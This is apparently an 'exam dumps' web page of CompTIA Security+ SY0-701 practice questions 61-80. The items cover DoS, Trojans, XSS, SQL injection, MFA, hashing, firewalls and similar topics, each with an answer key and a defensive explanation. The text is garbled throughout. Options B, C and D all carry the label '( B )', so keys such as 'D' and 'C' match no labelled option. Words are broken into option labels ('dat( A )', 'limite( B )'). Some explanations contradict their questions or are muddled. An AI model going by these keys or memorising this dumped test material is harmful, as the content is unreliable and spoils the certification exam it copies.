CompTIA SY0-701 Security+ Exam Dumps and Practice Test Questions Set 4 Q 61-80

Visit here for our full CompTIA SY0-701 exam dumps and practice test questions.

Question 61

Which type of attack attempts to overwhelm a system or network by sending excessive traffic to cause a disruption?

( A ) Phishing
( B ) Denial of Service (DoS)
( B ) SQL Injection
( B ) Man-in-the-Middle (MITM)

Answer: B

Explanation:

A Denial of Service (DoS) attack is designed to make a system, service, or network resource unavailable to its intended users by overwhelming it with a flood of traffic or sending malicious requests. Unlike phishing, which targets human behavior, SQL injection, which targets databases, or MITM attacks, which intercept communications, a DoS attack directly targets the availability of services. These attacks can take many forms, such as sending massive volumes of packets (flood attacks), exploiting application vulnerabilities to crash services, or consuming system resources until the system becomes unresponsive. Distributed Denial of Service (DDoS) attacks are an advanced variant where multiple compromised devices, often part of a botnet, coordinate to generate traffic, making mitigation more challenging.

Organizations defend against DoS attacks by implementing firewalls, intrusion prevention systems (IPS), traffic filtering, rate limiting, content delivery networks (CDNs), and robust network architecture. Monitoring traffic patterns and anomaly detection are essential to identify early signs of an attack. Effective mitigation combines technology with incident response planning to maintain availability and minimize downtime. Additionally, cloud-based services and redundant infrastructure can help absorb traffic surges caused by attacks. A comprehensive approach ensures the organization remains operational during an attack while maintaining security for other network components. DoS attacks emphasize the critical importance of designing systems with resilience and scalability to maintain service continuity and safeguard user access.

Question 62

Which type of malware disguises itself as legitimate software to trick users into executing it?

( A ) Trojan
( B ) Worm
( B ) Rootkit
( B ) Spyware

Answer: A

Explanation:

A Trojan is a type of malicious software that masquerades as a legitimate application or file to deceive users into installing or executing it. Unlike worms, which self-replicate and spread, or rootkits, which provide hidden administrative control, Trojans rely on social engineering techniques to compromise systems. Once installed, Trojans can create backdoors, steal sensitive data, log keystrokes, or download additional malware. 

They are often delivered through email attachments, malicious downloads, or fake software updates. Users may unknowingly introduce Trojans into their environment by trusting seemingly authentic sources. Protecting against Trojans requires a combination of endpoint security, updated antivirus and anti-malware solutions, user training, and secure browsing practices. Network monitoring and intrusion detection can help identify suspicious activity triggered by Trojan execution. Implementing least privilege principles ensures that even if a Trojan executes, its ability to impact the system is limite( B ) Regular backups and patch management also reduce the potential damage of Trojan infections. Understanding Trojan behavior, combined with preventative measures, is critical for maintaining organizational security and safeguarding sensitive information from unauthorized access.

Question 63

Which protocol provides encrypted communication for remote administration of network devices?

( A ) Telnet
( B ) SSH
( B ) FTP
( B ) HTTP

Answer: B

Explanation:

SSH, or Secure Shell, is a network protocol that provides encrypted communication for remote administration of devices such as servers, switches, and routers. Unlike Telnet, which transmits data in plaintext, SSH ensures confidentiality and integrity of commands sent over untrusted networks. FTP is used for file transfers, and HTTP secures web traffic only when combined with HTTPS. SSH uses asymmetric encryption for session initiation and symmetric encryption for data transfer, preventing eavesdropping, session hijacking, and tampering. 

It also supports authentication methods including passwords, public keys, and multifactor solutions. SSH is widely adopted for secure management of systems in enterprise environments, particularly when remote access is necessary. Implementing SSH key management, disabling root login over SSH, enforcing strong encryption algorithms, and using network segmentation further enhances security. SSH also supports tunneling, which allows secure transmission of additional protocols through encrypted channels. By adopting SSH for administrative tasks, organizations protect critical infrastructure from interception, unauthorized access, and network-based attacks while maintaining compliance with security best practices.

Question 64

Which security control limits user access based on their job responsibilities?

( A ) Role-Based Access Control (RBAC)
( B ) Mandatory Access Control (MAC)
( B ) Discretionary Access Control (DAC)
( B ) Attribute-Based Access Control (ABAC)

Answer: A

Explanation:

Role-Based Access Control (RBAC) is a security mechanism that restricts access to systems, applications, or data based on predefined roles aligned with job responsibilities. Unlike Mandatory Access Control, which enforces centralized policies, or Discretionary Access Control, which allows resource owners to set permissions, RBAC focuses on organizational roles. Attribute-Based Access Control adds flexibility by considering contextual attributes. 

RBAC simplifies permission management, reduces administrative overhead, and enforces the principle of least privilege by granting users only the permissions required to perform their duties. Roles are typically defined according to organizational functions, job titles, or departments. Implementation involves identifying roles, mapping permissions, and regularly auditing access rights to accommodate changes in responsibilities. RBAC also supports regulatory compliance by providing auditable access logs and ensuring that sensitive data is only accessible to authorized personnel. By using RBAC, organizations prevent unauthorized access, mitigate insider threats, and maintain operational security while improving administrative efficiency and scalability of access management.

Question 65

Which attack exploits a vulnerability in web applications by injecting malicious scripts into webpages viewed by other users?

( A ) Cross-Site Scripting (XSS)
( B ) SQL Injection
( B ) Command Injection
( B ) Directory Traversal

Answer: A

Explanation:

Cross-Site Scripting (XSS) is a type of cyberattack that targets web applications by injecting malicious scripts into webpages that are then viewed by other users. Unlike SQL injection, which manipulates backend databases, or command injection, which allows attackers to execute system-level commands, XSS exploits vulnerabilities in client-side code and the way web browsers interpret and display content. By exploiting these vulnerabilities, attackers can steal sensitive information such as session cookies, authentication tokens, or personal data, and even redirect users to malicious websites, potentially leading to further compromise of their accounts or devices.

XSS attacks are typically classified into three main categories: stored, reflected, and DOM-base( B ) Stored XSS occurs when malicious input is permanently saved on a server, such as in a database or comment section, and is delivered to every user who accesses the affected page. Reflected XSS, on the other hand, involves malicious scripts that are embedded in a URL or input that is immediately processed by the web application and displayed back to the user, usually after they click a link. DOM-based XSS operates entirely within the client’s browser, manipulating Document Object Model (DOM) elements without interacting with the server directly, often exploiting client-side scripts to execute malicious code.

Preventing XSS requires a combination of secure coding practices, thorough input validation, and careful handling of user-generated content. Output encoding is essential to ensure that scripts or HTML tags submitted by users are treated as data rather than executable code. Implementing content security policies (CSPs) helps restrict the execution of untrusted scripts, reducing the potential attack surface. Web application firewalls (WAFs) can provide additional protection by filtering malicious input before it reaches the application.

Organizations must also adopt secure development lifecycle practices, including regular security testing, code reviews, and automated vulnerability scanning to detect and remediate XSS flaws early. Educating developers and users about the risks associated with XSS is crucial to maintaining a strong security posture. By combining these preventive measures with monitoring and incident response strategies, organizations can safeguard sensitive data, protect user privacy, maintain trust, and ensure compliance with industry security standards, particularly for applications that handle personal or financial information.

Question 66

Which method is used to verify a user’s identity by requiring multiple forms of evidence?

( A ) Single-Factor Authentication
( B ) Multi-Factor Authentication (MFA)
( B ) Tokenization
( B ) CAPTCHA

Answer: B

Explanation:

Multi-Factor Authentication (MFA) is a security mechanism designed to enhance access control by requiring users to present multiple forms of verification before being granted access to systems, applications, or sensitive dat( A ) Unlike single-factor authentication, which relies solely on a password or PIN, MFA combines different types of credentials to create a layered defense. Typically, these factors include something the user knows, such as a password or security question; something the user has, such as a hardware token, smart card, or mobile authentication app; and something the user is, such as a fingerprint, facial recognition, or other biometric dat( A ) By requiring multiple forms of verification, MFA significantly reduces the risk of unauthorized access even if one credential is compromised.

MFA is particularly effective against common cyber threats, including phishing attacks, credential stuffing, and brute-force attacks. While attackers may be able to obtain a password, gaining access to the second or third authentication factor is considerably more difficult, making it a critical tool for protecting sensitive accounts and systems. Tokenization, which replaces sensitive data with unique tokens, and CAPTCHAs, which distinguish human users from automated bots, are often used alongside MFA to enhance security and reduce exposure to automated attacks.

Organizations widely adopt MFA for securing online services, enterprise networks, cloud platforms, and remote access solutions. Implementing MFA effectively requires careful selection of authentication factors, proper user training, and ongoing review of access policies to ensure they remain aligned with security requirements. Integrating MFA with identity and access management (IAM) systems, single sign-on (SSO) solutions, and endpoint monitoring further strengthens security by enabling centralized oversight and automated enforcement of access controls.

Question 67

Which type of vulnerability scanning technique simulates an attack to identify potential weaknesses without causing harm?

( A ) Passive Scanning
( B ) Active Scanning
( B ) Penetration Testing
( B ) Vulnerability Assessment

Answer: D

Explanation:

A vulnerability assessment is a structured and methodical process designed to identify, evaluate, and prioritize security weaknesses across an organization’s systems, networks, and applications. Its primary goal is to provide a clear understanding of potential risks without actively exploiting the vulnerabilities, which distinguishes it from penetration testing. Whereas penetration testing simulates real-world attacks to assess the effectiveness of defenses, vulnerability assessments focus on discovery and analysis, minimizing the likelihood of operational disruption while highlighting areas that require attention.

There are different approaches to conducting vulnerability assessments. Passive scanning involves monitoring network traffic and system behavior to detect anomalies and potential weaknesses without generating additional network activity. Active scanning, on the other hand, involves sending probes and requests to systems to detect open ports, misconfigurations, outdated software, and known vulnerabilities. Both approaches rely on automated tools, vulnerability databases, and risk scoring systems to evaluate the potential impact of identified issues. These tools can quickly process large environments, flagging high-priority vulnerabilities for remediation and helping security teams allocate resources efficiently.

The results of a vulnerability assessment are critical for guiding organizational security strategies. They provide actionable insights into misconfigurations, unpatched software, weak policies, and other gaps that could be exploited by attackers. Organizations use these findings to prioritize patch management, adjust security configurations, and implement preventive controls. Regular vulnerability assessments, when combined with continuous monitoring and robust patch management practices, contribute to maintaining a secure environment, reducing attack surfaces, and improving overall security posture.

In addition to technical benefits, vulnerability assessments support compliance with industry regulations and standards, offering documented evidence of proactive risk management. By integrating assessments with broader security processes, including risk management, security awareness programs, and incident response planning, organizations create a comprehensive defense framework. This holistic approach ensures vulnerabilities are addressed before they can be exploited, enhancing the resilience of systems, networks, and applications against evolving cyber threats while safeguarding critical assets and sensitive information.

Question 68

Which cryptographic technique ensures data integrity by producing a unique fixed-size output for any input message?

( A ) Symmetric Encryption
( B ) Hashing
( B ) Asymmetric Encryption
( B ) Digital Signing

Answer: B

Explanation:

Hashing is a fundamental cryptographic technique that transforms any input data into a fixed-length string of characters, known as a hash value. Its primary purpose is to ensure data integrity by allowing verification that the original information has not been altered during storage or transmission. Unlike encryption, whether symmetric or asymmetric, which focuses on maintaining confidentiality by making data unreadable to unauthorized users, hashing is one-way and irreversible, meaning that the original data cannot be reconstructed from the hash alone. This makes it particularly useful for scenarios where verification is needed without exposing sensitive information.

Hashing is widely employed in a variety of cybersecurity applications. For example, it is commonly used for storing passwords securely. Instead of saving the plaintext password, systems store its hash, so even if the database is compromised, the actual passwords remain protecte( B ) Hashing is also integral to message authentication codes (MACs), which verify that messages have not been tampered with, and in digital signatures, where a hash of the message is signed to validate authenticity and integrity. In blockchain technology, hashing ensures the integrity of transaction records by linking blocks together in a tamper-evident manner.

A key property of effective hash functions is that even a minor change in input data results in a drastically different hash, a characteristic known as the avalanche effect. This makes any unauthorized modifications easily detectable. Security considerations when implementing hashing include selecting strong algorithms with high collision resistance, such as SHA-256 or SHA-3, avoiding deprecated algorithms like MD5, and staying updated on emerging threats that may weaken certain hashing methods.

By providing reliable integrity verification, hashing plays a crucial role in maintaining trust in digital communications, securing authentication mechanisms, and supporting compliance with data protection standards. Organizations integrate hashing into their broader cybersecurity strategies to detect tampering, validate file and message authenticity, and ensure that sensitive information remains protected, even in environments exposed to potential attacks. This combination of integrity assurance and irreversible protection makes hashing a cornerstone of modern cybersecurity practices.

Question 69

Which network security device inspects incoming and outgoing traffic and blocks suspicious activity based on predefined rules?

( A ) Router
( B ) Firewall
( B ) Switch
( B ) Proxy

Answer: B

Explanation:

A firewall is a network security device designed to monitor, filter, and control incoming and outgoing traffic based on predefined security rules, creating a barrier between trusted internal networks and untrusted external networks such as the internet. Its primary function is to enforce organizational security policies by allowing legitimate traffic while blocking unauthorized or potentially harmful communications. Unlike routers and switches, which focus primarily on directing network traffic, or proxies that act as intermediaries for requests, firewalls specifically examine traffic for compliance with security rules and take action to prevent threats from reaching protected systems.

There are several types of firewalls, each providing different levels of protection. Packet-filtering firewalls examine packets based on source and destination addresses, ports, and protocols, providing a basic level of access control. Stateful inspection firewalls maintain awareness of active connections and can make decisions based on the state of network sessions, offering more context-aware protection. Proxy-based firewalls act as intermediaries that evaluate requests before forwarding them, often masking internal network structures. Next-generation firewalls (NGFWs) integrate advanced features such as deep packet inspection, intrusion prevention systems (IPS), application awareness, and the ability to detect complex attack patterns, providing more robust defense against modern threats.

Effective firewall deployment requires careful planning and configuration. Organizations must define rules that balance security with operational needs, regularly monitor firewall logs to detect suspicious activity, and update policies to address emerging threats. Firewalls play a critical role in preventing malware infiltration, mitigating distributed denial-of-service (DDoS) attacks, controlling unauthorized access, and supporting compliance with regulatory requirements.

Question 70

Which social engineering attack involves tricking individuals into revealing sensitive information over the phone?

( A ) Vishing
( B ) Phishing
( B ) Smishing
( B ) Tailgating

Answer: A

Explanation:

Vishing, short for voice phishing, is a type of social engineering attack in which attackers use phone calls to deceive individuals into divulging sensitive information, such as passwords, banking credentials, credit card numbers, or personally identifiable information. Unlike traditional phishing, which primarily targets users through email, or smishing, which relies on fraudulent text messages, vishing exploits the telephone as the primary communication channel. Attackers often use psychological manipulation techniques, including creating a sense of urgency, fear, or authority, to coerce victims into providing confidential information. They may impersonate trusted figures such as bank representatives, IT support personnel, government officials, or company executives, leveraging familiarity and trust to increase the likelihood of success.

Vishing attacks can be highly effective because they exploit human behavior rather than technical vulnerabilities. Attackers may claim that immediate action is required to prevent account suspension, financial loss, or legal consequences, prompting victims to act without verifying the caller’s legitimacy. Unlike tailgating, which breaches physical security by following authorized personnel into restricted areas, vishing focuses on extracting information remotely, often without any digital trace.

Mitigating vishing requires a combination of user awareness, procedural safeguards, and technical controls. Employee training is critical to help individuals recognize suspicious calls, question unsolicited requests for sensitive data, and follow verification protocols before disclosing any information. Organizations can implement policies that prohibit sharing confidential details over the phone without proper authentication or multi-step validation. Technical measures such as call-blocking services, spam and robocall filters, and monitoring systems that detect suspicious calling patterns further reduce risk.

Addressing vishing emphasizes the importance of integrating human vigilance with organizational security policies and technical safeguards. By fostering a culture of skepticism toward unsolicited calls, establishing verification processes, and deploying supportive technologies, organizations can significantly reduce the likelihood of sensitive information being compromise( B ) Effective vishing defense not only protects personal and corporate assets but also reinforces overall security awareness, helping maintain trust and operational integrity across business operations and digital communications.

Question 71

Which security model enforces access controls based on a user’s security clearance and data classification level?

( A ) Discretionary Access Control (DAC)
( B ) Mandatory Access Control (MAC)
( B ) Role-Based Access Control (RBAC)
( B ) Attribute-Based Access Control (ABAC)

Answer: B

Explanation:

Mandatory Access Control (MAC) is a highly structured and rigorous access control model designed to enforce strict security policies across an organization. In MAC, access to resources is governed by centrally defined rules based on classifications and security clearances rather than being determined by the resource owner. This contrasts with Discretionary Access Control (DAC), where individual users or owners have the authority to grant or restrict access to files or resources at their discretion. The centralized and non-negotiable nature of MAC ensures that access decisions remain consistent, predictable, and aligned with organizational security requirements, making it particularly suitable for environments where protecting sensitive information is critical.

In a MAC system, both users and resources are assigned security labels. Users are given a clearance level, while resources such as files, databases, or applications are assigned classification labels. Access is permitted only when the user’s clearance meets or exceeds the classification of the resource. This approach effectively enforces the principle of least privilege, ensuring that users can access only the information necessary to perform their roles, reducing the risk of accidental disclosure or intentional misuse of sensitive dat( A ) By strictly regulating access based on policy, MAC mitigates insider threats and enforces compliance with regulatory or organizational standards.

Implementation of MAC requires careful planning and execution. Data and resources must be accurately labeled according to sensitivity, and users must be assigned appropriate clearance levels. Operating systems, security modules, or specialized software enforce these policies, automatically controlling access without requiring intervention from resource owners. Continuous auditing and monitoring are essential components of MAC, allowing organizations to verify compliance, detect unauthorized access attempts, and adjust policies as needed.

MAC is widely used in government, military, defense, and other high-security sectors where the confidentiality and integrity of information are paramount. By providing a robust and structured framework for access control, MAC ensures that sensitive information is strictly protected, minimizing the likelihood of accidental or malicious exposure. Its disciplined approach to access management also supports adherence to regulatory standards, ensuring that organizations maintain both security and accountability across their systems and operations.

Question 72

Which attack involves intercepting communications between two parties to eavesdrop or alter data?

( A ) Denial of Service (DoS)
( B ) Man-in-the-Middle (MITM)
( B ) Cross-Site Request Forgery (CSRF)
( B ) Phishing

Answer: B

Explanation:

A Man-in-the-Middle (MITM) attack is a form of cyber threat where an attacker secretly intercepts or alters communication between two parties without their knowledge. Unlike attacks that focus on availability, such as Denial-of-Service (DoS), or attacks that primarily exploit human behavior, like phishing, MITM attacks compromise the confidentiality, integrity, and authenticity of data in transit. By positioning themselves between the sender and receiver, attackers can monitor communications, capture sensitive information, manipulate data, or inject malicious content. This makes MITM attacks particularly dangerous in scenarios involving financial transactions, login credentials, or private communications.

There are several common techniques used to carry out MITM attacks. ARP spoofing allows attackers to associate their MAC address with the IP address of a legitimate device, enabling interception of local network traffi( B ) DNS hijacking redirects users to malicious websites by altering DNS resolution. Rogue Wi-Fi hotspots or unsecured public networks are frequently exploited to eavesdrop on unsuspecting users. SSL stripping, on the other hand, downgrades secure HTTPS connections to unencrypted HTTP, exposing sensitive dat( A ) Attackers can use these methods to steal passwords, manipulate financial transactions, or implant malware, often without immediate detection.

Protecting against MITM attacks requires a combination of technical controls, secure protocols, and user awareness. Strong encryption protocols, such as HTTPS and TLS, ensure that intercepted communications cannot be easily deciphere( B ) Validating digital certificates and ensuring proper key exchange mechanisms prevent attackers from impersonating trusted parties. Virtual Private Networks (VPNs) add an additional layer of encryption, particularly on public networks. Multi-factor authentication further reduces the risk of unauthorized access even if credentials are intercepte( B ) Organizations should also implement continuous network monitoring to detect anomalies such as unexpected routing changes, certificate warnings, or unusual traffic patterns.

User education plays a critical role in preventing MITM attacks. Training users to recognize suspicious networks, avoid untrusted Wi-Fi, and verify the authenticity of websites or communications strengthens overall security. By combining encryption, secure authentication, monitoring, and user awareness, organizations can build a layered defense against MITM attacks, protecting sensitive data, maintaining the integrity of communications, and fostering trust in digital systems and networks.

Question 73

Which security practice ensures that a backup copy can restore data after corruption, loss, or a ransomware attack?

( A ) Business Continuity Planning
( B ) Disaster Recovery
( B ) Data Classification
( B ) Network Segmentation

Answer: B

Explanation:

Disaster Recovery (DR) is a critical aspect of organizational security and business continuity that focuses on the rapid restoration of IT systems, applications, and data following unexpected disruptions. These disruptions can arise from a variety of sources, including natural disasters like floods or earthquakes, hardware failures, cyberattacks such as ransomware, or human errors that compromise operational systems. Unlike Business Continuity Planning, which takes a broader approach to keeping overall business operations running during crises, disaster recovery is specifically concerned with the technical recovery of information technology resources to bring systems back online as quickly and reliably as possible.

A comprehensive disaster recovery strategy typically involves regular data backups, secure offsite storage, and redundant systems that allow for failover in the event of a system outage. Backups must be maintained carefully to ensure data integrity, particularly in the face of threats like ransomware, which can target backup files to prevent recovery. DR plans also define recovery objectives, including the Recovery Time Objective (RTO), which specifies the maximum acceptable downtime, and the Recovery Point Objective (RPO), which indicates the maximum tolerable data loss. These metrics guide the design of backup frequency, redundancy mechanisms, and system recovery procedures.

Testing and validation are essential components of disaster recovery. Regular drills ensure that personnel understand the steps required to restore systems under pressure and that the backup data can be reliably accessed and restore( B ) Additionally, DR planning often includes documenting recovery workflows, assigning roles and responsibilities, and ensuring that communication channels remain functional during a crisis. By implementing these measures, organizations can minimize operational disruption, reduce the risk of data loss, and maintain the confidentiality, integrity, and availability of critical information.

A well-structured disaster recovery framework not only protects IT infrastructure but also supports regulatory compliance and reinforces organizational resilience. It provides stakeholders with confidence that critical business functions can resume quickly and securely after a disruptive event. Ultimately, disaster recovery is a foundational element of an organization’s cybersecurity and risk management strategy, ensuring continuity and operational stability in the face of unexpected incidents.

Question 74

Which type of malware hides its presence by modifying system processes and kernel-level operations?

( A ) Rootkit
( B ) Trojan
( B ) Worm
( B ) Adware

Answer: A

Explanation:

A rootkit is an advanced form of malicious software specifically engineered to gain and sustain privileged access to a computer system while remaining undetecte( B ) Unlike other types of malware, such as Trojans, which require a user to execute them, or worms, which spread autonomously across networks, rootkits operate at a deep system level, often integrating with the kernel or core operating system components. By embedding themselves within critical processes, drivers, or system calls, rootkits can manipulate normal system behavior, making them extremely difficult to detect with conventional security tools like antivirus programs or intrusion detection systems. This stealthy operation allows attackers to maintain long-term control over compromised systems without alerting users or security administrators.

Rootkits are frequently used to carry out espionage, steal sensitive data, or enable unauthorized remote access. Because they conceal their presence so effectively, they can persist on a system for extended periods, allowing attackers to conduct covert operations and potentially escalate their privileges further. Detection of rootkits often requires specialized approaches, including integrity checking of system files, behavioral monitoring to spot anomalies, memory analysis, and offline scanning using trusted environments where the rootkit cannot interfere.

Preventing rootkit infections relies on a combination of proactive security measures. Regularly applying software patches and updates helps close vulnerabilities that attackers might exploit to install a rootkit. Implementing strict access controls and minimizing the use of administrative privileges reduces the opportunities for malware to gain high-level access. Security solutions that use heuristic analysis and behavior-based detection can provide additional layers of defense against previously unknown threats.

Rootkits highlight the necessity of a multi-layered security strategy, as they target both the integrity and confidentiality of systems and dat( A ) Continuous monitoring, endpoint protection, and prompt incident response are crucial to mitigate the risks associated with rootkits. Organizations must prioritize early detection, preventive measures, and rigorous security hygiene to safeguard networks and endpoints from these highly persistent and covert threats. By doing so, they can reduce the risk of long-term compromise and protect critical assets from sophisticated malicious actors.

Question 75

Which security technology encrypts web traffic between a browser and a web server to ensure confidentiality?

( A ) HTTP
( B ) HTTPS
( B ) FTP
( B ) Telnet

Answer: B

Explanation:

HTTPS, which stands for Hypertext Transfer Protocol Secure, is a communication protocol designed to protect data transmitted between a web browser and a web server. Unlike HTTP, which sends data in plain text and can be intercepted or modified by attackers, HTTPS uses encryption to ensure the confidentiality and integrity of information exchanged online. This encryption is provided through Transport Layer Security (TLS), a cryptographic protocol that safeguards data against eavesdropping, man-in-the-middle attacks, and tampering during transmission. By encrypting communications, HTTPS ensures that sensitive information such as login credentials, personal details, and financial transactions remain private and secure.

One of the key elements of HTTPS is the use of digital certificates issued by trusted Certificate Authorities (CAs). These certificates authenticate the identity of the server, assuring users that they are connecting to the legitimate website and not a malicious impostor. The TLS handshake process establishes a secure session by combining asymmetric encryption for securely exchanging cryptographic keys and symmetric encryption for efficiently encrypting the data itself. This approach balances strong security with minimal impact on performance, making HTTPS suitable for a wide range of web applications.

Organizations implement HTTPS to protect their users, particularly when handling sensitive or regulated dat( A ) Enforcing HTTPS across all web pages, including those that do not collect user information, helps prevent mixed-content issues and ensures that all interactions are secure. Additional measures, such as HTTP Strict Transport Security (HSTS), instruct browsers to automatically use secure connections, reducing the risk of downgrade attacks. Regular certificate management, including timely renewal and proper configuration, is critical for maintaining trust and avoiding potential security warnings that could undermine user confidence.

Beyond security, adopting HTTPS also supports regulatory compliance and fosters user trust, signaling that an organization takes data protection seriously. It mitigates common web threats associated with insecure traffic, such as credential theft, session hijacking, and interception of sensitive information. By maintaining a robust HTTPS implementation, organizations can provide a safe browsing environment, preserve the confidentiality and integrity of data, and strengthen overall cybersecurity resilience in an increasingly hostile online environment.

Question 76

Which form of social engineering uses text messages to trick users into revealing information or installing malware?

( A ) Phishing
( B ) Vishing
( B ) Smishing
( B ) Tailgating

Answer: C

Explanation:

Smishing is a type of social engineering attack that specifically targets mobile devices through SMS or text messaging. The term combines “SMS” and “phishing” and represents a method by which attackers attempt to trick users into revealing sensitive information, such as login credentials, financial details, or personal identification data, or into installing malicious software on their devices. Unlike traditional phishing, which typically relies on email as the primary delivery method, or vishing, which uses phone calls to manipulate victims, smishing takes advantage of the immediacy and personal nature of text messages to create a sense of urgency or legitimacy.

In a typical smishing attack, attackers may send messages that appear to come from trusted sources, such as banks, service providers, government agencies, or well-known companies. These messages often contain urgent instructions, such as verifying an account, confirming a payment, or claiming a prize. They may include links to fraudulent websites designed to capture credentials or prompt the recipient to download malicious applications that can compromise device security. Once a user interacts with the message, attackers can gain access to sensitive information, financial accounts, or even control over the device.

Mitigating smishing threats requires a combination of user education, technical controls, and organizational policies. Users should be trained to recognize suspicious messages, avoid clicking unknown links, and verify communications through official channels. Mobile device management (MDM) solutions can help monitor and enforce security policies, while anti-malware applications can detect and block malicious apps or links. Multi-factor authentication provides an additional layer of protection, limiting the impact if credentials are compromise( B ) Organizations should also establish policies that restrict sensitive communications over SMS and encourage verification through secure, trusted channels.

Proactive awareness and continuous monitoring are essential in combating smishing, as attackers constantly adapt their techniques to exploit human trust and mobile device vulnerabilities. By combining user vigilance, technical defenses, and policy enforcement, both individuals and organizations can reduce the risk of smishing attacks, safeguarding personal data, corporate resources, and overall mobile security against this growing and increasingly sophisticated threat vector.

Question 77

Which type of firewall can inspect traffic at the application layer to enforce more granular security policies?

( A ) Packet-Filtering Firewall
( B ) Stateful Inspection Firewall
( B ) Application Layer Firewall (Proxy Firewall)
( B ) Circuit-Level Gateway

Answer: C

Explanation:

Application layer firewalls, also known as proxy firewalls, are security devices that operate at the highest layer of the OSI model—the application layer—providing an advanced level of inspection and control over network traffi( B ) Unlike traditional packet-filtering firewalls that examine only header information such as source and destination IP addresses and ports, or stateful firewalls that monitor sessions and connection states, application layer firewalls analyze the actual content of the traffi( B ) This deep inspection capability allows them to understand and interpret application-specific protocols, such as HTTP, HTTPS, FTP, SMTP, and others, making it possible to enforce security policies based on the data and commands being transmitted rather than just the network metadata.

By examining the content of application traffic, these firewalls can detect and block malicious payloads, prevent SQL injection attempts, restrict unauthorized applications, and enforce granular rules tied to user behavior or organizational policies. For example, an application layer firewall can allow legitimate HTTP requests to pass while blocking requests containing malicious scripts or sensitive data exfiltration attempts. This functionality is particularly important for web applications, email servers, and other sensitive systems where attacks often exploit specific application vulnerabilities rather than the underlying network infrastructure.

Deployment of application layer firewalls often involves proxying traffic, which introduces an intermediary step between the client and the server. While this can add some latency, the trade-off is a significantly higher level of security and control. Modern implementations can also inspect encrypted traffic by performing TLS/SSL interception, allowing them to detect threats hidden within encrypted sessions. Additionally, these firewalls provide detailed logging and reporting, helping organizations monitor user activity, detect anomalies, and support compliance with regulatory requirements.

Application layer firewalls are a critical component of layered security strategies, enabling organizations to protect sensitive applications, enforce access controls, and mitigate complex attacks that bypass lower-level defenses. By understanding application behavior, monitoring content, and enforcing fine-grained policies, these firewalls ensure that organizations maintain robust protection against sophisticated threats targeting application vulnerabilities, while maintaining visibility over data flows and user interactions. This makes them indispensable in modern network security architectures.

Question 78

Which attack exploits web applications by manipulating input to execute unauthorized commands on a backend system?

( A ) Cross-Site Scripting (XSS)
( B ) SQL Injection
( B ) Directory Traversal
( B ) Cross-Site Request Forgery (CSRF)

Answer: B

Explanation:

SQL Injection (SQLi) is an attack targeting web applications by manipulating input to execute unauthorized SQL commands against a backend database. Unlike XSS, which affects client-side scripts, SQLi targets server-side database logi( B ) Attackers can retrieve sensitive data, modify records, bypass authentication, or escalate privileges. SQLi can be performed through form inputs, URL parameters, or API calls. Prevention strategies include input validation, prepared statements, parameterized queries, stored procedures, and least privilege access for database accounts. Web application firewalls can also provide an additional layer of defense. Regular testing, code reviews, and secure development lifecycle practices help identify and remediate vulnerabilities. SQL injection emphasizes the importance of robust input handling, secure coding, and comprehensive testing to protect sensitive information, maintain system integrity, and prevent attackers from gaining unauthorized access to critical databases or compromising business operations.

Question 79

Which authentication protocol uses tickets to grant access to services within a network securely?

( A ) RADIUS
( B ) Kerberos
( B ) LDAP
( B ) TACACS+

Answer: B

Explanation:

Kerberos is an authentication protocol that uses tickets to securely grant users access to network services without transmitting passwords over the network. It is designed for centralized authentication in enterprise environments, relying on a trusted Key Distribution Center (KDC) to issue time-limited tickets. RADIUS and TACACS+ focus on network access control, while LDAP primarily provides directory services. Kerberos enhances security by preventing replay attacks, eavesdropping, and unauthorized access. Clients obtain a Ticket-Granting Ticket (TGT) from the KDC, which can then be exchanged for service-specific tickets. Implementation requires synchronized system clocks, strong cryptography, and proper configuration of service accounts. Organizations leverage Kerberos to simplify authentication, enforce least privilege access, and integrate seamlessly with single sign-on solutions. By using tickets and strong encryption, Kerberos reduces password exposure, ensures identity verification, and strengthens the overall security posture of enterprise networks, protecting sensitive resources from unauthorized access.

Question 80

Which process involves transforming data into a coded form to prevent unauthorized access during storage or transmission?

( A ) Hashing
( B ) Encryption
( B ) Tokenization
( B ) Obfuscation

Answer: B

Explanation:

Encryption is the process of converting plaintext into ciphertext using cryptographic algorithms to protect data from unauthorized access. Unlike hashing, which ensures integrity, or tokenization, which substitutes sensitive data, encryption focuses on confidentiality. Data can be encrypted at rest (stored on devices) or in transit (moving across networks) using symmetric or asymmetric algorithms. Symmetric encryption uses the same key for encryption and decryption, while asymmetric encryption uses paired public and private keys. Encryption ensures that even if data is intercepted or stolen, it remains unreadable without the proper decryption key. Strong key management, secure algorithm selection, and regular updates are crucial for maintaining effective encryption. Encryption is widely used for securing communications, protecting sensitive files, safeguarding cloud storage, and complying with data protection regulations. By implementing encryption, organizations prevent unauthorized disclosure, maintain confidentiality, and strengthen overall cybersecurity posture against evolving threats.

 

Leave a Reply

How It Works

img
Step 1. Choose Exam
on ExamLabs
Download IT Exams Questions & Answers
img
Step 2. Open Exam with
Avanset Exam Simulator
Press here to download VCE Exam Simulator that simulates real exam environment
img
Step 3. Study
& Pass
IT Exams Anywhere, Anytime!